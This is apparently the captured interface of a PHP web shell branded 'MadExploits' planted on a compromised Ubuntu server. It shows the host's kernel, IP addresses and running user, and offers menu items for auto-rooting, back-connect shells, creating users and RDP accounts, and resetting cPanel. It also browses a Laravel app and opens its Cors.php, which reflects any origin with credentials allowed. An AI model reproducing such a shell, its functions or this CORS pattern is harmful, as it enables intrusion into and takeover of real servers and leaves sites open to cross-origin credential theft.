Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
app /
Http /
Middleware /
[ HOME SHELL ]
Name
Size
Permission
Action
Authenticate.php
416
B
-rw-r--r--
CheckApiToken.php
654
B
-rw-r--r--
CheckForMaintenanceMode.php
335
B
-rw-r--r--
Cors.php
1.06
KB
-rw-r--r--
EncryptCookies.php
294
B
-rw-r--r--
RedirectIfAuthenticated.php
523
B
-rw-r--r--
TrimStrings.php
340
B
-rw-r--r--
TrustProxies.php
429
B
-rw-r--r--
VerifyCsrfToken.php
483
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Cors.php
<?php namespace App\Http\Middleware; use Closure; class Cors { public function handle($request, Closure $next) { //dd($request->headers); //$allowedOrigins = ['http://tender.yojanatech.com.np/','http://localhost','http://localhost:8080']; //$requestHost = parse_url($request->headers->get('origin'), PHP_URL_HOST); // dd($requestHost); $origin = isset($_SERVER['HTTP_ORIGIN']) ? $_SERVER['HTTP_ORIGIN'] : ''; $arr['origin'] = $origin; info("origin", $arr); //dd($_SERVER['HTTP_ORIGIN']); //if (in_array($origin, $allowedOrigins)) { return $next($request) ->header('Access-Control-Allow-Origin', $origin) ->header('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE, OPTIONS') ->header('Access-Control-Allow-Headers',' Origin, Content-Type, Accept, Authorization, X-Request-With, cache-control,postman-token, token') ->header('Access-Control-Allow-Credentials',' true'); //} //return $next($request); } }
Close